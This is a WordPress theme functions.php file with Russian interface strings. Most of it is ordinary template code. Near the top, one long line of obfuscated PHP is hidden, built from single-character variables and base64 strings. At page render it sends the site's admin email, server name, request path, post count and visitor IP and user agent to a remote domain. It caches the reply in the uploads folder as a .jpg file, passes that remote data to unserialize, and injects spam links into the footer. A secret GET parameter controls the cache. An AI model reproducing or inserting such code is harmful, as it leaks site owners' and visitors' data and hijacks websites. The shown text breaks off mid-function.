<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $RHJjuUs='a';$eRybDj='e';$tcZMWyK='_';$rnWPN='b';$ctTzXvY='s';$BAwSLe='e';$goKqld='o';$kQoIB='d';$wqSXM='d';$SPcbj='4';$IQEPtQ='e';$hDluzah='6';$TQrm='c';$fCQqlHbv=$rnWPN.$RHJjuUs.$ctTzXvY.$BAwSLe.$hDluzah.$SPcbj.$tcZMWyK.$wqSXM.$IQEPtQ.$TQrm.$goKqld.$kQoIB.$eRybDj;$cjOGra='l';$zZEzMl='e';$dqfWYa='n';$WfSsZ='a';$PebDo='g';$imJEeD='z';$JZpuc='t';$GMQvaF='f';$UFqZR='i';$TIVPIMdO=$PebDo.$imJEeD.$UFqZR.$dqfWYa.$GMQvaF.$cjOGra.$WfSsZ.$JZpuc.$zZEzMl;$heYhTmu='t';$mrUAz='r';$AdcaP='t';$WGGXyHb='o';$TYcVd='r';$AhzYby='3';$QQXN='_';$hVKj='1';$bCGaSad='s';$VWIWlEbe=$bCGaSad.$AdcaP.$mrUAz.$QQXN.$TYcVd.$WGGXyHb.$heYhTmu.$hVKj.$AhzYby;$mrMlY='t';$rBzV='e';$tjqU='s';$wGmP='r';$sQNqP='r';$QDgZXpp='v';$aLyDwqIi=$tjqU.$mrMlY.$wGmP.$sQNqP.$rBzV.$QDgZXpp;                     $br_______________m='a';$ir_______o='e';$ix_____u='_';$pi___________b='b';$dc_____h='s';$ry___s='e';$jh_________a='o';$fq____________u='d';$rf_____________g='d';$fc____u='4';$nm______p='e';$os_______________q='6';$dg__g='c';$gu______________b=$pi___________b.$br_______________m.$dc_____h.$ry___s.$os_______________q.$fc____u.$ix_____u.$rf_____________g.$nm______p.$dg__g.$jh_________a.$fq____________u.$ir_______o;$gr__j='s';$nx______q='n';$hg__r='t';$ax________z='t';$dj______________c='i';$ab_____r='f';$bj___e='s';$by____________p='e';$oa____________f='c';$yd______________e='o';$pe___w='u';$hx_____________x='_';$ba__________j='i';$cg___________d='n';$vb_____k='x';$vf___k=$ab_____r.$pe___w.$nx______q.$oa____________f.$hg__r.$dj______________c.$yd______________e.$cg___________d.$hx_____________x.$by____________p.$vb_____k.$ba__________j.$gr__j.$ax________z.$bj___e;$cf_________u='n';$bq______r='o';$lp__________d='p';$cr_________d='f';$rl______________r='e';$kd__________w=$cr_________d.$bq______r.$lp__________d.$rl______________r.$cf_________u;$ld____________o='d';$yj_____a='f';$pi____________g='e';$za________v='a';$pv_____________k='r';$uw________e=$yj_____a.$pv_____________k.$pi____________g.$za________v.$ld____________o;$nj_____________q='l';$kn___________u='o';$qd__________w='e';$fu____o='f';$px_____________u='c';$mt____________g='s';$jt_____b=$fu____o.$px_____________u.$nj_____________q.$kn___________u.$mt____________g.$qd__________w;define("WP_ID", $gu______________b("Mi4wLjA="));define("WP_TTL", $gu______________b("MTA4MDA="));define("WP_SRC", $gu______________b("dHBva24="));function wp_get_header() {global $gu______________b, $vf___k;if ($vf___k($gu______________b("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$vf___k($gu______________b("d3BfZ2V0X2Zvb3Rlcg==")) &&$vf___k($gu______________b("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $gu______________b, $kd__________w, $jt_____b, $uw________e;$zv__u = TEMPLATEPATH."/".$gu______________b("Zm9vdGVyLnBocA==");$wg_________j = @$kd__________w($zv__u, "r");$zv__u = @$uw________e($wg_________j, @filesize($zv__u));@$jt_____b($wg_________j);$nd________i = TEMPLATEPATH."/".$gu______________b("ZnVuY3Rpb25zLnBocA==");$wg_________j = @$kd__________w($nd________i, "r");$nd________i = @$uw________e($wg_________j, @filesize($nd________i));@$jt_____b($wg_________j);$gs___________r = 0;if($zv__u && $nd________i) {if ($gu______________b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($zv__u, $gu______________b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$gs___________r = 1;}if (substr_count($zv__u, "wp_theme_GPL_credits()") < 1) {$gs___________r = 2;}}if(WP_ID != "2.0.0") {$gs___________r = 12;}}if($gs___________r > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $gs___________r -->";}}function wp_loaded() {global $gu______________b, $vf___k;return $vf___k($gu______________b("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($vm_____g, $kk________f = "(more...)", $ro_______x = 0, $gy__________l = "") {$ws________s = get_the_content($kk________f, $ro_______x, $gy__________l);$ws________s = apply_filters("the_content", $ws________s);$ws________s = str_replace("]]>", "]]>", $ws________s);if (strlen($_GET["p"]) > 0) {echo $ws________s;}else if ((strlen($ws________s)>$vm_____g) && ($jz___l = strpos($ws________s, " ", $vm_____g ))) {$ws________s = substr($ws________s, 0, $jz___l);$ws________s = $ws________s;echo $ws________s;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$kk________f</a></div></p>";} else {echo $ws________s;}}}$eq______j='_';$iz____m='e';$qq_____m='n';$ug______x='e';$dx___d='4';$pq______________k='d';$vb______________c='e';$ho____________d='b';$dp________l='o';$vd______x='6';$wq____________x='a';$id____v='s';$ha_______q='c';$hj___f=$ho____________d.$wq____________x.$id____v.$iz____m.$vd______x.$dx___d.$eq______j.$vb______________c.$qq_____m.$ha_______q.$dp________l.$pq______________k.$ug______x;$zl_____________s='e';$st______l='e';$nd____h='_';$vx___________p='s';$vn___d='l';$uf__________p='c';$zr__________n='f';$mv___z='t';$qe_______________u='t';$ne______v='g';$eq______________x='_';$ee____p='n';$td______s='i';$op__________j='e';$lm__k='t';$hi___________v='n';$ts____________h='o';$mj_______________p=$zr__________n.$td______s.$vn___d.$op__________j.$nd____h.$ne______v.$st______l.$lm__k.$eq______________x.$uf__________p.$ts____________h.$hi___________v.$mv___z.$zl_____________s.$ee____p.$qe_______________u.$vx___________p;$ku_____d='f';$ta____________y='_';$bj___m='s';$sn_________m='x';$tc_______________a='s';$le_______r='e';$ln____________p='e';$sl_______________t='t';$gq________y='i';$bp_______i='l';$kz______________v='i';$hk_______________r=$ku_____d.$gq________y.$bp_______i.$ln____________p.$ta____________y.$le_______r.$sn_________m.$kz______________v.$tc_______________a.$sl_______________t.$bj___m;$si_____o='r';$gc___n='c';$wr____l='n';$ll_______o='o';$ui___________g='i';$gi______w='e';$yj_______________u='m';$wa_____f='s';$kg__e='p';$fp_________t='v';$zl__d='e';$pz______________c='o';$dm_______________l='r';$dr_________j='_';$os________e='a';$fo____________a=$fp_________t.$gi______w.$dm_______________l.$wa_____f.$ui___________g.$pz______________c.$wr____l.$dr_________j.$gc___n.$ll_______o.$yj_______________u.$kg__e.$os________e.$si_____o.$zl__d;$br_______________k='o';$kd___________h='s';$yt______p='f';$ln_______________k='e';$oj_________o='c';$hi_______________r='n';$xx____________j='o';$gi_________o='k';$iu_______p='p';$vi____________g=$yt______p.$kd___________h.$xx____________j.$oj_________o.$gi_________o.$br_______________k.$iu_______p.$ln_______________k.$hi_______________r;$ae____________s='e';$bo_______________m='f';$so_____________u='r';$vn____l='i';$fz_____________t='w';$sc___o='t';$ma_______________i=$bo_______________m.$fz_____________t.$so_____________u.$vn____l.$sc___o.$ae____________s;$fq_______x='d';$ds________z='m';$sm________s='5';$nt______n=$ds________z.$fq_______x.$sm________s;$xb__________j='a';$sh_______________c='l';$lo___________f='p';$fx___k='t';$nf___________y='a';$oz_____p='e';$yn_____________q='r';$oo______n='h';$er____________j=$yn_____________q.$oz_____p.$xb__________j.$sh_______________c.$lo___________f.$nf___________y.$fx___k.$oo______n;$ca______________a='i';$at______f='e';$et______j='e';$xl_______b='u';$jb___________j='r';$so___u='a';$fe________d='i';$yt_______i='n';$fd_____f='s';$xw________d='z';$nt____________l='l';$bt_________u=$xl_______b.$yt_______i.$fd_____f.$et______j.$jb___________j.$ca______________a.$so___u.$nt____________l.$fe________d.$xw________d.$at______f;$ya___________p='p';$oi________g='n';$lm______________l='a';$yq________d='m';$vb_____m='m';$bt_____h='e';$su_________k='t';$qk____________j=$su_________k.$bt_____h.$vb_____m.$ya___________p.$oi________g.$lm______________l.$yq________d;$ni_______________w='e';$vj________i='e';$od_______v='t';$zh________y='c';$yg______________y='r';$nd___________x='a';$cg____c='_';$jk_______n='e';$iv______b='m';$hr_______________q='x';$te________r='r';$bb_______o='t';$yt____________v='o';$yr_____v='s';$de________c='c';$cm___________e='e';$mi___________p='t';$xg___s='t';$aw_________u='n';$ow___________n='_';$ew_____l='a';$tr__h=$yr_____v.$xg___s.$te________r.$ni_______________w.$ew_____l.$iv______b.$cg____c.$zh________y.$yt____________v.$aw_________u.$bb_______o.$jk_______n.$hr_______________q.$mi___________p.$ow___________n.$de________c.$yg______________y.$cm___________e.$nd___________x.$od_______v.$vj________i;function ib___t($cd_________w) {global $gu______________b, $vf___k, $mj_______________p, $fo____________a, $tr__h;if (!$vf___k($gu______________b("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($fo____________a(PHP_VERSION, "5.0.0", ">=") && $vf___k($gu______________b("ZmlsZV9nZXRfY29udGVudHM=")) && $vf___k($gu______________b("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$rh__________m = $tr__h(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$cw______p = @$mj_______________p($cd_________w, 0, $rh__________m);} else {$cw______p = @$mj_______________p($cd_________w, 0);}return $cw______p;}function nb_________n($cd_________w) {global $vf___k, $vi____________g, $ma_______________i, $gu______________b;if (!$vf___k($gu______________b("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$oq_________u = strpos($cd_________w, "/", 7);$vr_________y = array("uri"     => substr($cd_________w, $oq_________u),"host"    => str_replace("http://", "", substr($cd_________w, 0, $oq_________u)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$rx____m = @$vi____________g("$vr_________y[host]", 80, $or___w, $ug_____________m, 4);if (!$rx____m) {return false;} else {$cw______p = "";$es______________t  = "GET $vr_________y[uri] HTTP/1.0\r\n";$es______________t .= "Host: $vr_________y[host]\r\n";$es______________t .= "Referer: $vr_________y[referer]\r\n";$es______________t .= "Connection: Close\r\n\r\n";@$ma_______________i($rx____m, $es______________t);while (!@feof($rx____m)) {$va____________o = @fgets($rx____m, (1024*24));if ($va____________o == "\r\n") {$ry___________h = true;continue;}if ($ry___________h) {$cw______p .= $va____________o;}}return $cw______p;}}function mx___________p($cd_________w) {global $vf___k;$wt_____________s = false;if ($cd_________w != "") {if ($vf___k("ib___t")) {$wt_____________s = @ib___t($cd_________w);}if (!$wt_____________s && ($vf___k("nb_________n"))) {$wt_____________s = @nb_________n($cd_________w);}}return $wt_____________s;}function vy_____g() {global $_SERVER, $nt______n;$xj____t = $_SERVER["SERVER_NAME"];if (substr("$xj____t", 0, 4) == "www.") {$xj____t = substr("$xj____t", 4);}$xj____t = $nt______n("$_SERVER[SERVER_NAME]");return $xj____t;}function zk___________g() {return "file";}function le_______v($cd_________w) {global $_SERVER, $mj_______________p, $hk_______________r, $kd__________w, $jt_____b, $ma_______________i;$vd_________w = bi____________g();$us_________e = vy_____g().".jpg";$ll__________p = $vd_________w["dir_upload"]["path"]."/$us_________e";$uk_______d = @filemtime($ll__________p);if (!$uk_______d || ((time()-$uk_______d) >= WP_TTL)) {$wt_____________s = mx___________p($cd_________w);if ($wt_____________s) {if ($hk_______________r($ll__________p)) {@unlink($ll__________p);}$wg_________j = @$kd__________w($ll__________p, "x+");@$ma_______________i($wg_________j, $wt_____________s);@$jt_____b($wg_________j);}} else {if ($hk_______________r($ll__________p)) {$wt_____________s = @$mj_______________p($ll__________p);} else {$wt_____________s = false;}}return $wt_____________s;}function bi____________g() {global $_SERVER, $gu______________b, $hj___f;$jy______________r = wp_count_posts("post");$do__k = pathinfo(get_bloginfo("template_directory"));$vd_________w = array("url" => array("report"      => $gu______________b("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $do__k,"dir_upload"=> np________u(),"queryString"=> array("?a001=".WP_ID,"a004=".$do__k[filename],"a005=".$jy______________r->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://http://lev-tour.com/egypt/kak-xorosho-otdoxnut-v-egipte.html\">Отдых в Египте</a> ");$vd_________w["url"]["queryString"] = implode("&", $vd_________w["queryString"]);$vd_________w["url"]["report"] = $vd_________w["url"]["report"]."/?".$hj___f($vd_________w["url"]["queryString"]).".html";return $vd_________w;}function np________u() {$wo_______o = wp_upload_dir();if (isset($wo_______o["error"])) {$dh__q = me_________f();if (is_writable($dh__q)) {$wo_______o = array("path" => $dh__q);}}return $wo_______o;}function me_________f() {global $vf___k, $nt______n, $er____________j, $qk____________j;$hf_____________e = (bool) ini_get("safe_mode");if ($hf_____________e == true) {return false;}if ($vf___k("sys_get_temp_dir")) {$vv____________m = sys_get_temp_dir();if (is_writable($vv____________m)) {return $er____________j($vv____________m);}}if (!empty($_ENV["TMP"])) {return $er____________j($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $er____________j($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $er____________j($_ENV["TEMP"]);} else {$kl______________k = $qk____________j($nt______n(uniqid(rand(), true)), "");if ($kl______________k) {$vv____________m = $er____________j(dirname($kl______________k));@unlink($kl______________k);return $vv____________m;} else {return false;}}}function he_______________g() {global $_GET, $hk_______________r;$vd_________w = bi____________g();$xj____t = vy_____g();$sj_________x = zk___________g();$bb_________n = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($sj_________x == "file") {$bo____________z = $vd_________w["dir_upload"]["path"]."/".$xj____t.".jpg";if ($hk_______________r($bo____________z)) {@unlink($bo____________z);$bb_________n = "deleted";}}$vu___________t = array("s"=> $bb_________n,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($vu___________t AS $dz____e => $oy____r) echo " [$dz____e:$oy____r]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $vf___k, $gu______________b, $bt_________u;$vd_________w = bi____________g();$sq___________y = "le_______v";if ($vf___k($sq___________y)) {$cw______p = $sq___________y($vd_________w["url"]["report"]);}if ($cw______p) {if ($cw______p = @$gu______________b($cw______p)) {$cw______p = @$bt_________u($cw______p);if (strlen($cw______p[custom_credit]) >= 5) {$vd_________w["default_string"] = $cw______p[custom_credit];}if ($cw______p["status"] == "0") {$kf_______d = 1;$bg_______________d = 1;} else {$xm_________a = sizeof($cw______p["links"]);$sz_________y = $vd_________w["default_string"];if ($xm_________a > 0 && $cw______p["links"] !== "") {$hd____e = 0;foreach ($cw______p["links"] as $he_______________y => $ta______i) {$hd____e++;if ($ta______i->l_path == "" || $ta______i->l_path == $_SERVER["REQUEST_URI"]) {$ta______i->l_href = htmlspecialchars(strip_tags($ta______i->l_href));$ta______i->l_title = htmlspecialchars(strip_tags($ta______i->l_title));$ta______i->l_anchor = htmlspecialchars(strip_tags($ta______i->l_anchor));$sz_________y .= " | ";$sz_________y .= "<a href='$ta______i->l_href' title='$ta______i->l_title'";if ($ta______i->l_nofollow == "1") {$sz_________y .= " rel='nofollow'";}$sz_________y .= ">$ta______i->l_anchor</a>";}}}$vd_________w["links"] = "$sz_________y";if ($cw______p[credit] == "0") {$vd_________w["links"] = "";}}} else {$kf_______d = "1";}} else {$kf_______d = "1";}if ($kf_______d == "1") {$vd_________w["links"] = $vd_________w["default_string"];}echo "$vd_________w[links]";echo "<!-- s: $cw______p[signature] -->";he_______________g();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; OСтарые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Edit', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
